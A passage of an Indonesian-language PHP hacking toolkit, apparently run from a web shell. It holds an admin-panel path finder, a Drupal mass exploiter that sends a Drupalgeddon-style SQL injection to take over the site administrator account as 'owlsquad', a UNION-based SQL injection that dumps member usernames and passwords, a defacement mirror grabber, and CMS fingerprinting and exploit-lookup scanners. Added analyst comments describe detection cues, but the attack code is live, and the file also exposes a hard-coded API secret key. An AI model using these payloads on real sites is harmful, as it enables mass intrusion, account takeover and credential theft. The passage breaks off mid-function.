675echo "<br />Crot ".$url."<br /><br />";
676
677$adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/", "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", 
"author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
678
679foreach ($adminlocales as $admin){
680$headers = get_headers("$url$admin");
681if (eregi('200', $headers[0])) {
682 echo "[<a href='$url/$admin'>$url$admin</a> <font color='gold'>Ketemu Nih !</font><br />";
683}
684else {
685 echo "$url$admin <font color='red'>Tidak Ketemu</font><br />";
686 echo "<center>";
687}
688}
689}
690echo "</center>";
691}
692if($_GET['go'] == 'drupal') {
693 echo "<div class='mybox'>
694<center><h1>Drupal Mass Exploiter</h1><hr color='white'><br>
695<form method='post' action=''>
696<textarea rows='10'class='mybox' cols='10' name='url'>
697http://www.site.com
698http://www.site2.com</textarea><br><br>
699<input type='submit' class='kotak' style='border-color:white' name='submit' value='SIKAT!'>
700</form>
701</div>
702";
703$drupal = ($_GET["drupal"]);
704if($drupal == 'drupal'){
705$filename = $_FILES['file']['name'];
706$filetmp = $_FILES['file']['tmp_name'];
707echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
708 <input type='file'name='file' />
709 <input type='submit' value='drupal !' />
710</form></div>";
711move_uploaded_file($filetmp,$filename);
712}
713 error_reporting(0);
714 if (isset($_POST['submit'])) {
// Analyst note: sends one unauthenticated POST to "$url/user/login/" in which the
// `name[...]` array KEY (not its value) carries a stacked SQL UPDATE against the
// `users` row with uid 1, replacing its name, password hash and status.
// NOTE(review): the request shape looks like the Drupal 7 login-form SQL injection
// commonly called "Drupalgeddon" -- confirm against the vendor advisory before
// labelling an incident with it.
//
// $url comes from the POSTed textarea and is only trimmed by the caller.
// Nothing is returned; the caller's `echo exploit($url)` prints an empty string.
//
// Detection and response pointers, all taken from this listing:
//   - request: POST to /user/login/ with form_id=user_login and a `name[` parameter
//     whose key contains `;`, spaces or SQL keywords;
//   - database: the uid 1 row renamed to the account name in the payload, status set to 1;
//   - host running the shell: an `exploited.txt` file in the working directory.
// Mitigation sits on the target: patched core, and rejecting request parameter keys
// that are not plain identifiers before they reach the query builder.
715 function exploit($url) {
716 $post_data = "name[0;update users set name %3D 'owlsquad' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
717 $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
718", 'content' => $post_data));
719 $ctx = stream_context_create($params);
720 $data = file_get_contents($url . '/user/login/', null, $ctx);
// Success is only a heuristic: either a PHP warning text leaked by the target or the
// reflected `FcUk Crap` value appears in the response body. A "Success" line is
// therefore not proof that the UPDATE was applied.
721 if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
// Append the hit to exploited.txt ('a+' creates the file when it does not exist).
722 $fp = fopen("exploited.txt", 'a+');
723 fwrite($fp, "Exploitied User: owlsquad Pass: owlsquad =====> {$url}/user/login");
724 fwrite($fp, "
725");
726 fwrite($fp, "--------------------------------------------------------------------------------------------------");
727 fwrite($fp, "
728");
729 fclose($fp);
730
731 echo "<font color='lime'><b>Success:<font color='white'>owlsquad</font> Pass:<font color='white'>owlsquad</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
732 } else {
733 echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
734 }
735 }
736
737 $urls = explode("
738", $_POST['url']);
739 foreach ($urls as $url) {
740 $url = @trim($url);
741 echo exploit($url);
742 }
743 }
744
745}
746elseif ($_GET['go'] == 'alexa') {
747 # code...
748echo "<center>
749<h1>AlexaRanks/moz rank Mass Checker</h1><hr>
750<form method='post'>
751<textarea name='url_form' cols='40' rows='8' style='width: 400px'>";
752?>
753<?php
754$_REQUEST['url_form'];
755echo "</textarea >
756<br />
757<input type='radio' name='alexa'> [Alexa-Ranks]
758<input type='radio' name='moz'> [DA/PA+MozRanks]<br>
759<input type='submit' style='margin-top: 5px; font-size: 18px' value='Check Metrics' />
760</form>
761</center>";
762$url1 = explode("\r\n",$_POST['url_form']);
763if($_POST['alexa']){
764 echo '<div style="margin: auto; width: 50%; min-width: 400px">
765<table width="500" cellpadding="5" cellspacing="5">
766<thead style="text-align: left">
767<tr><th>WEB</th><th>RANKS</th><th>COUNTRY</th><th>RANK</th></tr></thead>
768<tbody>';
769foreach ($url1 as $url){
770 $p = parse_url($url);
771$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$p['host']);
772
773$rank = isset($xml->SD[1]->POPULARITY)?$xml->SD[1]->POPULARITY->attributes()->TEXT:0;
774
775$negara = isset($xml->SD[1]->COUNTRY)?$xml->SD[1]->COUNTRY->attributes()->NAME:0;
776
777$web = (string)$xml->SD[0]->attributes()->HOST;
778
779$negara1 = isset($xml->SD[1]->COUNTRY)?$xml->SD[1]->COUNTRY->attributes()->RANK:0;
780
781echo "<tr><td> ".$web." </td><td> ".$rank."</td><td>".$negara." </td><td> ".$negara1."</td></tr>";
782}
783
784echo '</tbody></table>
785<br><br>';
786}
787
788if($_REQUEST['moz']) {
789$urls = trim($_POST['url_form']);
790$urls = explode("\n", $urls);
791$urls = array_filter($urls, 'trim');
792}
793if(!$urls) {
794exit;
795}
796echo '<div style="margin: auto; width: 50%; min-width: 400px">
797<table width="500" cellpadding="5" cellspacing="5">
798<thead style="text-align: left">
799<tr><th>ID</th><th>URL</th><th>DA</th><th>PA</th><th>MR</th><th>EL</th></tr></thead>
800<tbody>';
801?>
802<?php
803$hitung = 0;
804$urlx = array();
805$verif_url = array_chunk($urls,80);
806foreach($verif_url as $chunk) {
807sleep(2);
808unset($url);
809$url = $chunk;
810$seo = API_MOZ($url);
811if($seo['error'] != '') {
812echo "Error[SEOMoz]: ".$seo['error']."<br>";
813} else {
814foreach($seo as $index => $data) {
815$urls['pa'] = number_format($data['pa'], 0, '.', '');
816$urls['url'] = $data['url'];
817$urls['da'] = number_format($data['da'], 0, '.', '');
818$urls['title'] = $data['title'];
819$urls['external_links'] = $data['external_links'];
820$urls['mozrank'] = number_format($data['mozrank'], 2, '.', '');
821$hitung++;
822echo "<tr><td>";
823echo $hitung;
824echo "</td><td>";
825echo str_replace("http://","",$urls['url']);
826echo "</td><td>";
827echo $urls['da'];
828echo "</td><td>";
829echo $urls['pa'];
830echo "</td><td>";
831echo $urls['mozrank'];
832echo "</td><td>";
833echo $urls['external_links'];
834echo "</td>";
835echo "</tr>";
836$urlx[] = $urls;
837}
838}
839}
840?>
841echo '</tbody></table>
842<br><br>';
843<?php
844$_SESSION['urlx'] = $urlx;
845if(!empty($urlx)) { }
846?>
847echo '</center>
848</div>';
849<?php
850// Document code by Moz
851// www.stateofdigital.com
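// Fetch Moz "url-metrics" rows for a batch of URLs.
//
// Builds an HMAC-SHA1 signature over "<accessID>\n<expires>" (expiry = now + 600 s),
// POSTs the JSON-encoded URL list to the endpoint and maps each returned metric row
// back onto the URL at the same position in the batch.
//
// Parameters:
//   $objectURL  array of URLs to look up (the caller passes array_chunk() pieces of 80).
// Returns:
//   array('error' => message) when the transfer fails, the body is not a JSON
//   array/object, or the API reports error_message; otherwise a 0-based list of
//   rows with keys url, subdomain, domain, pa, da, mozrank, title, external_links
//   (an empty array when the API returns no rows).
//
// NOTE(review): the access id and secret key are hard-coded, and this file is
// published in the clear; a key exposed like this should be treated as compromised
// and rotated by its owner. Code that is meant to be kept should read credentials
// from configuration outside the web root.
// NOTE(review): the request uses plain http, so the signature and the submitted URL
// list are readable on the wire.
function API_MOZ($objectURL) {
    // See https://moz.com/products/api/keys to obtain an accessID and secretKey.
    // your accessID
    $accessID = "mozscape-4f3765f6c2";
    // your secretKey
    $secretKey = "72c60c0d7f5bc0fad86ab432eaaf32ce";
    $expires = time() + 600;
    $stringToSign = $accessID."\n".$expires;
    $binarySignature = hash_hmac('sha1', $stringToSign, $secretKey, true);
    $urlSafeSignature = urlencode(base64_encode($binarySignature));
    // Sum of single-bit values passed as `Cols`; presumably each bit selects one
    // response column -- confirm against the API documentation.
    $cols = 68719476736+34359738368+536870912+32768+16384+2048+32+4;
    $requestUrl = "http://lsapi.seomoz.com/linkscape/url-metrics/?Cols=".$cols."&AccessID=".$accessID."&Expires=".$expires."&Signature=".$urlSafeSignature;

    // Re-index the batch so json_encode() emits a JSON array and so that position
    // $count below always refers to the URL that was sent at that position.
    $batchedDomains = array_values((array) $objectURL);
    $encodedDomains = json_encode($batchedDomains);

    $options = array(CURLOPT_RETURNTRANSFER => true, CURLOPT_POSTFIELDS => $encodedDomains);
    $ch = curl_init($requestUrl);
    curl_setopt_array($ch, $options);
    $content = curl_exec($ch);
    // Read the error text before the handle is closed.
    $transferError = ($content === false) ? curl_error($ch) : '';
    curl_close($ch);

    // Report a failed transfer through the same 'error' key the caller already checks,
    // instead of decoding `false` and returning an undefined variable.
    if ($content === false) {
        return array('error' => 'request failed: '.$transferError);
    }

    $response = json_decode($content, true);
    if (!is_array($response)) {
        return array('error' => 'unexpected response body');
    }
    if (isset($response['error_message'])) {
        return array('error' => $response['error_message']);
    }

    // Always defined, so an empty result set yields an empty array rather than null.
    $list = array();
    $count = 0;
    foreach ($response as $metric) {
        $list[$count] = array(
            'url'            => isset($batchedDomains[$count]) ? $batchedDomains[$count] : null,
            'subdomain'      => isset($metric['ufq']) ? $metric['ufq'] : null,
            'domain'         => isset($metric['upl']) ? $metric['upl'] : null,
            'pa'             => isset($metric['upa']) ? $metric['upa'] : null,
            'da'             => isset($metric['pda']) ? $metric['pda'] : null,
            'mozrank'        => isset($metric['umrp']) ? $metric['umrp'] : null,
            'title'          => isset($metric['ut']) ? $metric['ut'] : null,
            'external_links' => isset($metric['ueid']) ? $metric['ueid'] : null,
        );
        $count++;
    }
    return $list;
}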
890}
891elseif ($_GET['go'] == 'domain') {
892 # code...
893echo '<center>
894<h1>domain grabber</h1><hr color=white><form action="" method="POST">
895<textarea name="text" placeholder="souce "></textarea>
896<br><input type=txt name="shell"></input>
897<input type="radio" name="gb1"> Grabber
898<input type="radio" name="gb2"> Parse
899<input type="radio" name="gb3"> script defacement mirror
900<input type="radio" name="gb4"> add http
901<br><input type="submit" name="zone" value="Extract"></form></center><center>';
902if($_POST['gb1']){
903 $data = $_POST['text'];
904 preg_match_all('#((www.)?[a-z0-9-]+\.([a-z]{2,4}\.)?[a-z]+/(?:.*))#' , $data , $result);
905 echo "<textarea>";
906 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
907$ee = parse_url("http://".$result[1][$x]);
908echo "http://".$ee['host']."\n";
909}
910echo "</textarea></center>";
911}
912
913if($_POST['gb2']){
914 $data = $_POST['text'];
915 preg_match_all('/[(] (.*?) [)]/' , $data , $result);
916 echo "<textarea>";
917 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
918$ee = parse_url("http://".$result[1][$x]);
919echo "http://".$ee['host']."\n";
920}
921echo "</textarea>";
922}
923if($_POST['gb3']){
924 $data = $_POST['text'];
925 $shell = $_POST['shell'];
926 preg_match_all('#((www.)?[a-z0-9-]+\.([a-z]{2,4}\.)?[a-z]+/(?:.*))#' , $data , $result);
927 echo "<textarea>";
928 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
929$ee = parse_url("http://".$result[1][$x]);
930echo "http://".$ee['host'].$shell."\n";
931}
932echo "</textarea></center>";
933}
934if($_POST['gb4']){
935 $data = $_POST['text'];
936// memecah string input berdasarkan karakter '\r\n\r\n'
937$pecah = explode("\r\n", $data);
938
939// string kosong inisialisasi
940$text = "";
941
942// untuk setiap substring hasil pecahan, sisipkan <p> di awal dan </p> di akhir
943// lalu menggabungnya menjadi satu string utuh $text
944for ($i=0; $i<=count($pecah)-1; $i++)
945{
946 $part = str_replace($pecah[$i], "http://".$pecah[$i], $pecah[$i]."\n");
947 $text .= $part;
948}
949
950// menampilkan outputnya
951 echo "<textarea>";
952echo $text;
953}
954echo "</textarea></center>";
955}
956elseif ($_GET['go'] == 'sqlbalitbang') {
957echo "<center><form action='' method='POST'>
958<input type='text' name='target' placeholder='target.sch.id'><br>
959<font color='white'><textarea cols='50' color='white' rows='10' name='sqli'>make_set(6,@:=0x0a,(select(1)from(t_member)where@:=make_set(511,@,0x3c6c693e,username,password)),@)</textarea><br>
960Note : concat(0x3c2f613e,command);<br><br>";
961echo "<input type='submit' name='inject' value='Inject'>
962</form></center><hr size='1'></center>";
963if(isset($_POST['inject'])){
964$target=$_POST['target'];
965$sqli=$_POST['sqli'];
966echo "<font size='3'>Url : $target<br>Command : $sqli<br><br> Output : ";
967$ch = curl_init();curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_URL, "$target/member/listmemberall.php");curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "queryString=hantu%'/**/union/**/select/**/$sqli,version()-- -");curl_setopt($ch, CURLOPT_TIMEOUT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);curl_setopt($ch, CURLOPT_VERBOSE, true);$buf = curl_exec ($ch);curl_close($ch);
968unset($ch);
969sleep(1);
970echo "<textarea>$buf";
971echo "</textarea>";
972}
973}
974elseif ($_GET['go'] == 'cmsscanner') {
975echo '<center><form action="" method="POST">
976<textarea name=site></textarea><br>
977<input style="width: 300px;" type=submit name=au>
978</center>';
979
980// 0x1999
981// Web Based By UstadCage_48
// Fetch $url with a plain cURL GET and hand back whatever curl_exec() produced:
// the response body as a string, or false when the transfer fails.
// Only the URL and RETURNTRANSFER are set, so cURL defaults apply to timeouts,
// redirects and TLS; $url is passed through unchanged.
function send($url){
    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => 1,
    ));
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
// Append "$site", followed by the line break and whitespace embedded in the string
// literal below, to "<ext>.txt" in the current working directory.
// $ext is interpolated into the file name unchecked; every call visible in this
// listing passes a fixed label ("WordPress", "Joomla", ..., "Unknown"), so the
// output is a predictable set of per-category list files -- useful artefacts when
// triaging a host where this script has run.
// Returns nothing, so callers that `echo save(...)` print an empty string.
// The fopen() result is not checked before fwrite()/fclose().
990function save($site,$ext){
991 $fp = fopen("$ext.txt", 'a');
992 fwrite($fp, "$site
993 ");
994 fclose($fp);
995}
// Classify one site by fetching it with send() and testing the response body against
// an ordered chain of regexes; the first match wins, its label is echoed and the
// site is appended to the matching "<label>.txt" file through save().
//
// Reading notes for analysts:
//   - $site is passed to send() as given, so the request leaves from the host running
//     this script and can reach any address cURL accepts, internal ones included.
//   - The patterns are unanchored substring tests with unescaped dots, so a category
//     file is a rough guess and says nothing reliable about the software on the site.
//   - A failed fetch (send() returning false) matches nothing and lands in "Unknown".
//   - $site is echoed into the HTML output without escaping.
//   - Nothing is returned; the caller's `echo detect($sites)` prints an empty string.
996function detect($site){
997 $send = send($site);
998if(preg_match('/\/wp-content\/|\/wp-includes\/|\/xmlrpc.php/',$send)) {
999 echo "[WordPress]: $site<br>";
1000echo save("$site","WordPress");
1001}
1002elseif(preg_match('/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla|\/media\/system\/js\/|mootools-core.js|com_content|Joomla!/',$send)) {
1003 echo "[Joomla]: $site<br>";
1004echo save("$site","Joomla");
1005 }
1006elseif(preg_match('/\/faq.php\/vb|\/clientscript\/|vBulletin|vbulletin/',$send)) {
1007 echo "[VBulletin]: $site<br>";
1008echo save("$site","vbulletin");
1009 }
1010elseif(preg_match('/Drupal|drupal|sites\/all|drupal.org/',$send)) {
1011 echo "[Drupal]: $site<br>";
1012echo save("$site","Drupal");
1013 }
1014elseif(preg_match('/\/skin\/frontend\/base\/default\/|\/\/magentocore.net\/mage\/mage.js|\/webforms\/index\/index\/|\/customer\/account\/login/',$send)) {
1015 echo "[Magento]: $site<br>";
1016echo save("$site","Magento");
1017 }
1018elseif(preg_match('/route=product|OpenCart|route=common|catalog\/view\/theme/',$send)) {
1019 echo "[OpenCart]: $site<br>";
1020echo save("$site","OpenCart");
1021 }
1022elseif(preg_match('/zcadmin\/login.php|zcadmin|zencart/',$send)) {
1023 echo "[ZenCart]: $site<br>";
1024echo save("$site","ZenCart");
1025 }
1026elseif(preg_match('/\/collections\/all|Powered by Shopify|\/\/cdn.shopify.com\//',$send)) {
1027 echo "[Shopify]: $site<br>";
1028echo save("$site","Shopify");
1029 }
1030
1031elseif(preg_match('/xenforo|XenForo|uix_sidePane_content/',$send)) {
1032 echo "[XenForo]: $site<br>";
1033echo save("$site","XenForo");
1034 }
1035elseif(preg_match('/semua-agenda.html|foto_banner\/|lokomedia/',$send)) {
1036 echo "[Lokomedia]: $site<br>";
1037echo save("$site","Lokomedia");
1038 }
1039elseif(preg_match('/typo3|TYPO3|Typo3/',$send)) {
1040 echo "[Typo3]: $site<br>";
1041echo save("$site","Typo3");
1042 }
1043elseif(preg_match('/filemanager.php|filemanager|fileman|\/assets\/global\/plugins\/|\/assets\/plugins\/|\/assets\/public\/plugins\/|\/assets\/private\/plugins\/|\/assets\/admin|\/admin\/plugins\/|assets\/dashboard\//',$send)) {
1044 echo "[ Filemanager Source ]: $site<br>";
1045echo save("$site","filemanager_source");
1046 }
1047elseif(preg_match('/upload.php|admin.php|administrator.php|upload file|input type=\"file\"/',$send)) {
1048 echo "[Weak Website]: $site<br>";
1049echo save("$site","Weak_website");
1050 }
1051elseif(preg_match('/porn|blowjob/',$send)) {
1052 echo "[X]: $site<br>";
1053echo save("$site","xxx");
1054 }
// NOTE(review): this pattern looks for Blogger markers (feed path, generator meta tag),
// yet the label and output file say Typo3/TYPO3 -- entries in TYPO3.txt may therefore
// not be TYPO3 sites at all.
1055elseif(preg_match("/\/feeds\/posts\/default?alt=rss|meta content=\'blogger\' name=\'generator\'/",$send)) {
1056 echo "[Typo3]: $site<br>";
1057echo save("$site","TYPO3");
1058 }
1059elseif(preg_match('/Liferay|liferay/',$send)) {
1060 echo "[Liferay]: $site<br>";
1061echo save("$site","Liferay");
1062 }
1063elseif(preg_match('/Wolf|Wolf CMS|\?admin/',$send)) {
1064 echo "[Wolf]: $site<br>";
1065echo save("$site","Wolf");
1066 }
1067elseif(preg_match('/timthumb|\/tim.php|\/thumb.php|\/foto.php/',$send)) {
1068 echo "[Timthumb]: $site<br>";
1069echo save("$site","Timthumb");
1070 }
1071elseif(preg_match('/Index of|Last modified/',$send)) {
1072 echo "[Naked Website]: $site<br>";
1073echo save("$site","Naked_website");
1074 }
1075elseif(preg_match('/mcc.godaddy.com\/park\/|domain has expired|Domain Expired|domain expired|Undermainteance|mcc.godaddy.com|Under Construction|Construction|expired/',$send)) {
1076 echo "[Expired]: $site<br>";
1077echo save("$site","Expired");
1078 }
// Fallbacks: any body containing "html", "head" or "body" counts as live but
// unclassified; everything else, failed fetches included, is "Unknown".
1079elseif(preg_match('/html|head|body/',$send)) {
1080 echo "[Live But Unknown]: $site<br>";
1081echo save("$site","Live_but_unknown");
1082 }
1083else{
1084 echo "[Unknown]: $site<br>";
1085echo save("$site","Unknown");
1086}
1087}
1088
1089$er = explode("\r\n",$_POST['site']);
1090if($_POST['au']){
1091 echo "<br>";
1092foreach($er as $sites){
1093 echo detect($sites);
1094}
1095}
1096}
1097elseif($_GET['go'] == 'cmsvuln') {
1098 @set_time_limit(0);
1099 @error_reporting(0);
1100// Script Functions , start ..!
// Look up $component on a public exploit search page and print the two remaining
// table cells for the row the caller has already opened.
//
// Reading notes for analysts:
//   - $component is scraped from a remote page by the get_* callers, then interpolated
//     unencoded into the search URL and unescaped into the HTML output, so markup
//     served by a scanned site is rendered in the browser of whoever runs this page.
//   - The fetch error is suppressed with @. A failed request yields false, which does
//     not contain "No results", so the else branch prints a link anyway: a link in
//     the output is not evidence that any entry exists.
//   - eregi() was removed in PHP 7, so this function only runs on PHP 5.x hosts.
//   - Nothing is returned.
1101function ask_exploit_db($component){
1102$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
1103$result = @file_get_contents($exploitdb);
1104if (eregi("No results",$result)) {
1105echo"<td>Gak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
1106}else{
1107echo"<td><a href='$exploitdb'>Klik Ini..!</a></td><td><--</td></tr>";
1108}
1109}
1110/**************************************************************/
1111/* Joomla Conf */
// Joomla branch of the scanner: download $site, pull candidate component names out of
// the markup with three patterns ("option,<x>/", "option=<x>" and "/components/<x>/"),
// de-duplicate them and print one table row per name via ask_exploit_db().
//
// Reading notes for analysts:
//   - $site reaches file_get_contents() unchanged apart from the caller's
//     strip_tags(trim()), so the fetch is made by the server and accepts whatever
//     stream wrappers PHP has enabled.
//   - The names come only from text on the fetched page; they identify neither an
//     installed version nor a weakness.
//   - Scraped names are echoed without escaping.
//   - Nothing is returned; output is written directly.
1112function get_components($site){
1113$source = @file_get_contents($site);
1114preg_match_all('{option,(.*?)/}i',$source,$f);
1115preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
1116preg_match_all('{/components/(.*?)/}i',$source,$f3);
// Merge the first capture group of each pattern into one candidate list.
1117$arz=array_merge($f2[1],$f[1],$f3[1]);
1118$coms=array();
1119if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1120foreach(array_unique($arz) as $x){
1121$coms[]=$x;
1122}
1123foreach($coms as $comm){
1124echo "<tr><td>$comm</td>";
1125ask_exploit_db($comm);
1126}
1127}
1128/**************************************************************/
1129/* WP Conf */
// WordPress branch of the scanner: download $site, collect every distinct path
// segment that follows "/plugins/" in the markup and print one table row per name
// via ask_exploit_db().
//
// Reading notes for analysts:
//   - Only plugins that reference assets on the fetched page are seen; the list is
//     neither complete nor versioned.
//   - On the target side this shows up as an ordinary page fetch, so it is hard to tell
//     apart from normal traffic; keeping plugins updated and removing unused ones is
//     the control that matters.
//   - Scraped names are echoed without escaping.
//   - Nothing is returned; output is written directly.
1130function get_plugins($site){
1131$source = @file_get_contents($site);
1132preg_match_all("#/plugins/(.*?)/#i", $source, $f);
1133$plugins=array_unique($f[1]);
1134if(count($plugins)==0){ echo "<tr><td style='border-color:white' colspan=1>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1135foreach($plugins as $plugin){
1136echo "<tr><td>$plugin</td>";
1137ask_exploit_db($plugin);
1138}
1139}
1140/**************************************************************/
1141/* Nuke's Conf */
// "Nuke" branch of the scanner: download $site, try to extract module names from
// "?name=<x>" style links and "/modules/<x>/" paths, de-duplicate them and print one
// table row per name via ask_exploit_db().
//
// Reading notes for analysts:
//   - NOTE(review): the first two patterns start with `?` directly after the opening
//     delimiter, i.e. a quantifier with nothing to repeat; PCRE presumably rejects
//     them, leaving $f and $f2 without a [1] entry -- confirm on the PHP version in use.
//   - The dispatcher in this listing compares the form value against "Nuke's" while
//     the <option> offered is "Nukes", so the form as shown never reaches this function.
//   - Scraped names are echoed without escaping.
//   - Nothing is returned; output is written directly.
1142function get_numod($site){
1143$source = @file_get_contents($site);
1144preg_match_all('{?name=(.*?)/}i',$source,$f);
1145preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2);
1146preg_match_all('{/modules/(.*?)/}i',$source,$f3);
1147$arz=array_merge($f2[1],$f[1],$f3[1]);
1148$coms=array();
1149if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1150foreach(array_unique($arz) as $x){
1151$coms[]=$x;
1152}
1153foreach($coms as $nmod){
1154echo "<tr><td>$nmod</td>";
1155ask_exploit_db($nmod);
1156}
1157}
1158/*****************************************************/
1159/* Xoops Conf */
// Xoops branch of the scanner: download $site, collect the path segment following
// "/modules/" wherever it occurs in the markup, de-duplicate the names and print one
// table row per name via ask_exploit_db().
//
// Reading notes for analysts:
//   - array_merge() with a single argument just re-indexes the capture list.
//   - As in the sibling get_* functions, the names come only from text on the fetched
//     page and are echoed without escaping.
//   - Nothing is returned; output is written directly.
1160function get_xoomod($site){
1161$source = @file_get_contents($site);
1162preg_match_all('{/modules/(.*?)/}i',$source,$f);
1163$arz=array_merge($f[1]);
1164$coms=array();
1165if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1166foreach(array_unique($arz) as $x){
1167$coms[]=$x;
1168}
1169foreach($coms as $xmod){
1170echo "<tr><td>$xmod</td>";
1171ask_exploit_db($xmod);
1172}
1173}
1174/**************************************************************/
1175 /* Header */
// Open the result table and print its header row, with $site shown both as link
// target and as link text.
// $site is concatenated into an href attribute and into element content without
// escaping; the caller in this listing only applies strip_tags(trim()), which removes
// tags but leaves quote characters intact, so a crafted value can still break out of
// the attribute. Context-aware escaping (htmlspecialchars with ENT_QUOTES) is the
// usual control for this output pattern.
// The table opened here is not closed by this function. Nothing is returned.
1176function t_header($site){
1177echo'<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">';
1178echo'
1179<tr>
1180<td>Site : <a href="'.$site.'">'.$site.'</a></td>
1181<td>Exploit-db</b></td>
1182<td>Exploit it !</td>
1183</tr>
1184';
1185}
1186echo '<div class="mybox" style="text-align:left"><center>
1187<h1>CMS Vulnerability Scanner</h1><hr color="white">
1188<form method="POST" action="" class="header-izz">
1189 <p>Link  <input type="text" width:500px;" name="site" value="http://127.0.0.1/" >
1190 <br><br>
1191 CMS
1192    <select name="pilihan" width:500px;">
1193 <option>Wordpress</option>
1194 <option>Joomla</option>
1195 <option>Nukes</option>
1196 <option>Xoops</option>
1197 </select><br><br>       <input type="submit" style="width: 50px; height: 30px;" value="Sikat" class="kotak"></p>
1198</form>';
1199// Start Scan :P :P ...
1200if($_POST){
1201$site=strip_tags(trim($_POST['site']));
1202t_header($site);
